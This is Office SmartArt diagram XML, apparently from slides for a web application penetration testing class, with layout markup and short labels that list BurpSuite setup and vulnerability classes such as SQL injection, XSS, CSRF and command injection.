    <dgm:cxn modelId="{83DC03BC-E792-4FAB-930E-85A5D663DFF5}" srcId="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" destId="{FBE270B9-EA2A-4276-8BF7-FA420ED14B0A}" srcOrd="0" destOrd="0" parTransId="{9BA0CA90-90C5-483D-9EB4-920895E1FA36}" sibTransId="{D6CA14A8-3CE1-46FD-8ED7-0FDC755A0E67}"/>
    <dgm:cxn modelId="{296E43C4-ADAF-4585-A872-AAB457D5C2BC}" srcId="{0D8F2297-58E8-4791-9D8E-A09C991C88A8}" destId="{24EEA9FD-845F-4E9D-9FDC-5A8828E5913B}" srcOrd="3" destOrd="0" parTransId="{90ADDD93-ED13-481A-A933-3F4EE135CEAF}" sibTransId="{CDAB23BE-6857-4E9E-8CA9-0C2FC65A9E3A}"/>
    <dgm:cxn modelId="{D4D23C46-6076-4A73-809C-44ECC5CF13C5}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D2F6B10E-3E09-4B64-97D8-262A66B4BC5F}" type="presParOf" srcId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" destId="{34A8CAB2-C5E7-44DD-9EE2-85BACE6F4C66}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD10DE28-1D1B-4871-90C9-6BF097E000CE}" type="presParOf" srcId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" destId="{DE538B89-3EE0-4CBE-96C6-0CB2587FB7E9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{67CA71CB-0CFF-4345-A476-62D09EB9781F}" type="presParOf" srcId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" destId="{F0118A55-3E3F-42DA-A7B5-1061B4607EDD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DF7DFE03-DB06-4C8A-A375-16AC9814B884}" type="presParOf" srcId="{D7798D4F-8ED3-4AA8-B46D-A58AABE11607}" destId="{0ADD3A92-8CE6-4469-9681-FA8DB1ED0077}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7275DFD6-52A8-4737-9A30-84A448868D7D}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{FC6E3100-D70B-4380-8C1B-2EDC6007C0A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9DADA0EC-F6A4-4D2D-A7A1-2A781BE827C7}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C06A3C0E-7DCF-42D1-8F94-03911288FF84}" type="presParOf" srcId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" destId="{808CCB7E-DB94-4610-9C81-292825DFEF61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1ED52DC2-D3DF-4B0D-9FDB-65A36649002E}" type="presParOf" srcId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" destId="{08933C2F-35A5-4E6D-93AC-D1CF95B91306}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FEABF633-4DC5-41C2-8B77-C5548F436762}" type="presParOf" srcId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" destId="{33D403A6-10CE-4186-B0CF-651270FA7E07}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5F2F4DF7-2516-45E1-A9BD-06274D18CC65}" type="presParOf" srcId="{4DD9252A-881E-4AFC-8090-C1EA31DDF008}" destId="{B3AE0DA2-F359-4939-9FEE-621D18F8DE7C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B8480391-2B9E-4210-946B-203B9222C57B}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{52412E48-858B-49D4-96FC-DF7697BD54FC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EF05CA18-4944-46A6-93C4-E49C1A277859}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{48E4499F-CB4A-4A9C-AE0F-CD5257323444}" type="presParOf" srcId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" destId="{956DB420-7BFE-41C4-ABDB-C013A1A9FEAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D4D93D36-F2ED-4DE2-BB9E-41DEB0950670}" type="presParOf" srcId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" destId="{D5C34A1B-934E-4D43-915D-6CEA03B2B9BB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7BB23194-CD6C-48BF-A29C-ED0D6CB23E2C}" type="presParOf" srcId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" destId="{3DC26732-5C7F-40A3-A502-B23C7D886BA7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3E11143C-7C48-44AC-BD18-F32FC591EEE4}" type="presParOf" srcId="{70F046CC-2F1E-4763-BAA5-B93E20CBCD10}" destId="{26CD59CF-01EA-47B9-94F9-FDF9CA3F62E5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6CD012A6-4DCC-4A30-B59D-44CCE859BA66}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{74083E8B-8ADA-465D-8DFA-7F1DEC585822}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{781AA1D9-FF21-4749-A639-D248C53D9771}" type="presParOf" srcId="{5C8013DC-8B33-4F4C-A1DB-56C2FFCBFC92}" destId="{86C9E128-F2BD-4473-877C-648B8653D88C}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{76DE9781-FA05-4337-87EB-5CB0CAAE712D}" type="presParOf" srcId="{86C9E128-F2BD-4473-877C-648B8653D88C}" destId="{DAADC582-CEED-4CE7-8DCD-F7BC0BDE788F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D5A34537-BB6C-425D-B0AC-C6390537E45F}" type="presParOf" srcId="{86C9E128-F2BD-4473-877C-648B8653D88C}" destId="{CB5FCFE8-7D4F-4DCA-A599-C62FB0583F12}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7FC393FB-3275-4ACB-A7E7-D426590CAE1F}" type="presParOf" srcId="{86C9E128-F2BD-4473-877C-648B8653D88C}" destId="{A46663CE-B46E-49EE-967B-CD90B83D9FA5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4C050483-2031-424A-8498-AF795F741AA2}" type="presParOf" srcId="{86C9E128-F2BD-4473-877C-648B8653D88C}" destId="{40890F1C-BCA7-4BAA-AE61-E60625AD57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D6051-37F4-4A6D-B14E-D36F82DB530A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="103109" y="436368"/>
          <a:ext cx="832275" cy="8322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46CFD5-B1E2-4B4B-AEB8-CF1B8F3A916A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277887" y="611146"/>
          <a:ext cx="482720" cy="482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400509-63C9-4E06-A324-7C76995D049F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1113730" y="436368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Installing and configuring BurpSuite</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1113730" y="436368"/>
        <a:ext cx="1961793" cy="832275"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6260BFF0-3499-45AE-8417-C9652615FE6D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3417351" y="436368"/>
          <a:ext cx="832275" cy="8322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F18F30-1861-4BFC-A770-61F9ED75B37A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3592129" y="611146"/>
          <a:ext cx="482720" cy="482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64C0E1-3363-4F1D-91EF-CADAB5304059}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4427972" y="436368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Overview of important webapp pentesting principles</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4427972" y="436368"/>
        <a:ext cx="1961793" cy="832275"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{30B91549-EF96-4289-B190-2899E639E635}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="103109" y="2136562"/>
          <a:ext cx="832275" cy="8322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14C9CF-1FE1-489B-8E97-44A2215BCD2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277887" y="2311339"/>
          <a:ext cx="482720" cy="482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81F3AB-5D14-433B-9ACB-5F7DD3ADDE56}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1113730" y="2136562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Continue working on webapp problems</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1113730" y="2136562"/>
        <a:ext cx="1961793" cy="832275"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{61952209-C338-44C9-BBE4-58A8A9F5FA00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3417351" y="2136562"/>
          <a:ext cx="832275" cy="8322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7477BD-16AB-4BE7-ACAE-9463265E797D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3592129" y="2311339"/>
          <a:ext cx="482720" cy="482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A8D0B9-5B56-4E44-8BB6-A39C5B0D473D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4427972" y="2136562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Start working on linux based problems</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4427972" y="2136562"/>
        <a:ext cx="1961793" cy="832275"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{40D60D5F-96EF-4981-8596-9FC516CE727B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="103109" y="3836755"/>
          <a:ext cx="832275" cy="8322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DBFB9B-4A2C-4EC3-B624-ACD4A1325DF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277887" y="4011533"/>
          <a:ext cx="482720" cy="4827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0129EF-F297-4BCB-B7D2-E05346BCBAC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1113730" y="3836755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Whatever we have time for!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1113730" y="3836755"/>
        <a:ext cx="1961793" cy="832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60432-2022-41D5-9C5F-6C6107A4F8FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="829627"/>
          <a:ext cx="6492875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27B1DA-0670-4426-941A-9A4B0C63BB75}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="463315" y="1174241"/>
          <a:ext cx="842391" cy="842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28DCCD-3C7B-4603-83AD-B89CD08DD68E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769021" y="829627"/>
          <a:ext cx="4723853" cy="153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96" tIns="162096" rIns="162096" bIns="1620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Proxy for intercepting, inspecting and altering HTTP requests</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769021" y="829627"/>
        <a:ext cx="4723853" cy="1531620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{229107CC-C275-4D3E-8964-435F5BB98AFE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2744152"/>
          <a:ext cx="6492875" cy="15316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2704D2-359F-46D8-B9F8-ED40F00A63AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="463315" y="3088767"/>
          <a:ext cx="842391" cy="842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17D0CA-F27B-4E6B-AA96-117F5A159DD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769021" y="2744152"/>
          <a:ext cx="4723853" cy="153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96" tIns="162096" rIns="162096" bIns="1620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Contains a wide range of wide range of web app pentesting related functionalities </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769021" y="2744152"/>
        <a:ext cx="4723853" cy="1531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0EDAC-A270-4C30-8591-57AEE8AF6D85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="585671" y="100019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71602-5F0D-4933-B3BC-4D02784182FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="973234" y="138776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C90A52-9882-4125-9D8F-2E4FB65D8442}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4328" y="338520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Attacking the host – server side attacks</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4328" y="3385200"/>
        <a:ext cx="2981250" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E47D7B3F-7DB3-4FFA-99BD-FEFB8881B496}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4088640" y="100019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1ACF90-0C8F-48BF-8465-94BD7071C9A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4476203" y="138776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E6E33D-8E78-4E2B-A037-CD6CD9B350BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3507296" y="338520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Attacking the user – client side attacks </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3507296" y="3385200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7EB8B-2D18-E24F-8D8A-9A1608CD0338}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="356520"/>
          <a:ext cx="6492875" cy="1007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SQL injection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="49176" y="405696"/>
        <a:ext cx="6394523" cy="909018"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D077A4D8-CD8E-5646-9AF4-D88B4661AEDD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1484850"/>
          <a:ext cx="6492875" cy="1007370"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="386882"/>
                <a:satOff val="-3448"/>
                <a:lumOff val="-719"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="386882"/>
                <a:satOff val="-3448"/>
                <a:lumOff val="-719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File Inclusion vulnerabilities </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="49176" y="1534026"/>
        <a:ext cx="6394523" cy="909018"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BD131630-A37A-E449-A8A0-CBE2DDBA9B8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2613180"/>
          <a:ext cx="6492875" cy="1007370"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="773765"/>
                <a:satOff val="-6895"/>
                <a:lumOff val="-1438"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="773765"/>
                <a:satOff val="-6895"/>
                <a:lumOff val="-143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Command injection </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="49176" y="2662356"/>
        <a:ext cx="6394523" cy="909018"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CE8192F-1E09-084D-A7ED-1FB0E238CF7A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3741510"/>
          <a:ext cx="6492875" cy="1007370"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="1160647"/>
                <a:satOff val="-10343"/>
                <a:lumOff val="-2157"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="1160647"/>
                <a:satOff val="-10343"/>
                <a:lumOff val="-215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Code execution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="49176" y="3790686"/>
        <a:ext cx="6394523" cy="9090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97640-7894-2246-B47F-58FB05426381}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="251939"/>
          <a:ext cx="6492875" cy="10553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Open redirection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51517" y="303456"/>
        <a:ext cx="6389841" cy="952306"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6860F821-3AEA-764E-AF51-03E6BA612772}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1433999"/>
          <a:ext cx="6492875" cy="1055340"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="386882"/>
                <a:satOff val="-3448"/>
                <a:lumOff val="-719"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="386882"/>
                <a:satOff val="-3448"/>
                <a:lumOff val="-719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Cross Site Scripting </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51517" y="1485516"/>
        <a:ext cx="6389841" cy="952306"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F30445AD-291C-B245-8CFF-9D81BF096E93}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2616059"/>
          <a:ext cx="6492875" cy="1055340"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="773765"/>
                <a:satOff val="-6895"/>
                <a:lumOff val="-1438"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="773765"/>
                <a:satOff val="-6895"/>
                <a:lumOff val="-143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Cross Site request forgery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51517" y="2667576"/>
        <a:ext cx="6389841" cy="952306"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0153DCCF-0C2D-4F4F-862E-20F0FFDBD5F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3798120"/>
          <a:ext cx="6492875" cy="1055340"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="1160647"/>
                <a:satOff val="-10343"/>
                <a:lumOff val="-2157"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="102000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:hueOff val="1160647"/>
                <a:satOff val="-10343"/>
                <a:lumOff val="-215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Web cache deception </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51517" y="3849637"/>
        <a:ext cx="6389841" cy="9523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AC5E9-8F99-49E7-ABC0-379BFAA1566B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88B88-75FE-411B-95AD-0F40FF44CDC8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7A5FB-64A8-4315-B4CA-C9E8BA340424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is too much to teach in web application security</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1684370" y="623"/>
        <a:ext cx="4808504" cy="1458329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A53C9AAB-58E6-4593-AFA9-E2DE8B2983AA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21E0E-7BD9-4A22-BCE0-C878258E5DAE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7BC75-8AE8-4899-8891-B93C73707DF2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Focus on one topic</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1684370" y="1823535"/>
        <a:ext cx="4808504" cy="1458329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E1C3C528-0F6E-4C81-A64C-84B6EE70C701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DCEE4-A1B2-41B7-937A-55B0692BDE61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54E8B-30F7-4981-8D84-4B62D66B4F65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 a template for learning about other topics on your own</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1684370" y="3646447"/>
        <a:ext cx="4808504" cy="14583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9EF2F-5671-4332-AEB6-7A71545C4F0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="829627"/>
          <a:ext cx="6492875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258925-E30D-4866-A326-67A4A832B7AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="463315" y="1174241"/>
          <a:ext cx="842391" cy="842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1C96A-F89F-491E-AD3B-575CEBC601DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769021" y="829627"/>
          <a:ext cx="4723853" cy="153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96" tIns="162096" rIns="162096" bIns="1620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a remote shell?</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769021" y="829627"/>
        <a:ext cx="4723853" cy="1531620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D47ABB40-68B0-4B9D-BA71-BD3163C5EFA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2744152"/>
          <a:ext cx="6492875" cy="15316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50ED75-4704-49F4-8895-AF5AC75636B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="463315" y="3088767"/>
          <a:ext cx="842391" cy="842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86F4BB-87DE-48B9-9339-52A9E03CE542}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1769021" y="2744152"/>
          <a:ext cx="4723853" cy="153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96" tIns="162096" rIns="162096" bIns="1620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remote code execution?</a:t>
